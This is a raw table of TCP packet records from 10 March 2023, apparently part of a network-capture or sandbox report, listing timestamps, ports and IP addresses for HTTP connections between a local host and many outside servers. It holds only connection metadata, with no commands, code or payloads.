                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238123894 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238141060 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238163948 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238871098 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238946915 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238970995 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238991022 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239008904 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239020109 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239027977 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239039898 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239059925 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239928007 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.239948034 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240052938 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240072966 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240091085 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240143061 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240159988 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240890980 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240912914 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240930080 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240948915 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240967035 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240968943 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.240995884 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241027117 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241486073 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241540909 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241573095 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241591930 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241610050 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241624117 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241628885 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241667032 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.241698027 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.242609978 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.242629051 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.242816925 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.242846966 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248115063 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248173952 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248203993 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248225927 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248239040 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248287916 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248476028 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248497009 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248512030 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248524904 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248538971 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.248616934 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249315023 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249347925 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249377012 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249398947 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249407053 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249425888 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249435902 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249449968 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.249475956 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251800060 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251835108 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251863003 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251893044 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251903057 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251923084 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251929045 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251951933 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.251977921 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252233028 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252264977 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252290010 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252291918 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252305984 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252321959 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252326965 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252351999 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252363920 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.252388954 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253287077 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253317118 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253345013 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253346920 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253370047 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253374100 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253388882 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253398895 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253410101 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.253437996 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257828951 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257862091 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257891893 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257920027 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257922888 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257949114 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257951021 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.257977009 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.258001089 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.258011103 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.258021116 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.258065939 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.265783072 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.265855074 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.265944958 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.265952110 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.265974998 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266005993 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266033888 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266056061 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266067028 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266103029 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266104937 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266151905 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266151905 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.266195059 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268098116 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268140078 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268184900 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268217087 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268215895 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268248081 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268256903 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268275976 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268297911 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268321991 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268532991 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.268580914 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.591602087 CET4982780192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.601357937 CET4982880192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.605396986 CET4982980192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.625479937 CET8049829188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.625761986 CET4982980192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.629547119 CET8049827135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.629730940 CET4982780192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.631634951 CET8049828185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.631789923 CET4982880192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.645880938 CET4982980192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.645931959 CET4982880192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.645944118 CET4982780192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.665944099 CET8049829188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.666022062 CET8049829188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.666125059 CET4982980192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.676280975 CET8049828185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.676748037 CET8049828185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.676843882 CET4982880192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.683917999 CET8049827135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.684392929 CET8049827135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.684724092 CET4982780192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.716387987 CET4983080192.168.2.6104.21.55.224
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.716466904 CET4983180192.168.2.6193.166.255.171
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.733197927 CET8049830104.21.55.224192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.733361959 CET4983080192.168.2.6104.21.55.224
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.747458935 CET4983080192.168.2.6104.21.55.224
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.759574890 CET4983280192.168.2.6188.114.97.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.764195919 CET8049830104.21.55.224192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.774244070 CET8049830104.21.55.224192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.774444103 CET4982780192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.774858952 CET4983080192.168.2.6104.21.55.224
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.774859905 CET4982980192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.776514053 CET8049832188.114.97.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.776647091 CET4983280192.168.2.6188.114.97.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.795001984 CET8049829188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.795233011 CET4982980192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.812968016 CET8049827135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.813323975 CET4982780192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.827316999 CET4982880192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.847147942 CET4983280192.168.2.6188.114.97.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.859337091 CET8049828185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.859436035 CET4982880192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.864031076 CET8049832188.114.97.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.875058889 CET8049832188.114.97.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.875237942 CET4983280192.168.2.6188.114.97.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.916380882 CET4983380192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.925159931 CET804982282.201.61.230192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.925283909 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.953242064 CET804983381.2.194.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.953444004 CET4983380192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.118272066 CET4983480192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.119280100 CET4983380192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.124579906 CET4983580192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.156145096 CET804983381.2.194.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.174237967 CET804983381.2.194.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.174334049 CET4983380192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.293694973 CET4979280192.168.2.6198.100.146.220
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.300858974 CET4983380192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.336222887 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.339365959 CET4983780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.342956066 CET8049783103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.343050957 CET4978380192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.353332996 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.353518963 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.354079962 CET804983381.2.194.241192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.354209900 CET4983380192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.371995926 CET804983746.242.238.60192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.372168064 CET4983780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.405241013 CET804983460.43.154.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.405391932 CET4983480192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.405858040 CET8049835202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.405946970 CET4983580192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.425697088 CET4983780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.425765038 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.426413059 CET4983480192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.427442074 CET4983580192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.427443027 CET4983980192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.427647114 CET4984080192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.427663088 CET4983880192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.442749023 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.458323956 CET804983746.242.238.60192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.459193945 CET804983746.242.238.60192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.459317923 CET4983780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.552099943 CET8049840108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.552227974 CET4984080192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.572031975 CET804983954.161.222.85192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.572170019 CET4983980192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.572658062 CET4984080192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.592926025 CET804983869.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.593267918 CET4983880192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.623665094 CET4983980192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.626003027 CET4983880192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.657205105 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.657239914 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.657284021 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.657332897 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.697196960 CET8049840108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.702542067 CET4984180192.168.2.664.125.133.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.704704046 CET8049840108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.704790115 CET4984080192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.709306955 CET8049835202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.710629940 CET8049835202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.710714102 CET4983580192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.713965893 CET804983460.43.154.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.714004040 CET804983460.43.154.138192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.714090109 CET4983480192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.720952034 CET4984280192.168.2.6172.67.201.26
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.738110065 CET8049842172.67.201.26192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.738257885 CET4984280192.168.2.6172.67.201.26
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.767713070 CET804983954.161.222.85192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.767757893 CET804983954.161.222.85192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.767824888 CET4983980192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.767855883 CET4983980192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.789870024 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.790360928 CET4984280192.168.2.6172.67.201.26
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.790687084 CET4984080192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.790931940 CET804983869.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.791348934 CET804983869.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.791436911 CET4983880192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.806808949 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.807104111 CET8049842172.67.201.26192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.826560974 CET4983480192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.826586962 CET4983980192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.851416111 CET4983880192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.852745056 CET4983580192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.865657091 CET4984380192.168.2.654.161.222.85
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.920253038 CET8049840108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.920447111 CET4984080192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.931339979 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.931375027 CET8049836188.114.96.3192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.931488037 CET4983680192.168.2.6188.114.96.3
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.970415115 CET804983954.161.222.85192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.007242918 CET804979680.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.007340908 CET4979680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.010392904 CET804984354.161.222.85192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.010528088 CET4984380192.168.2.654.161.222.85
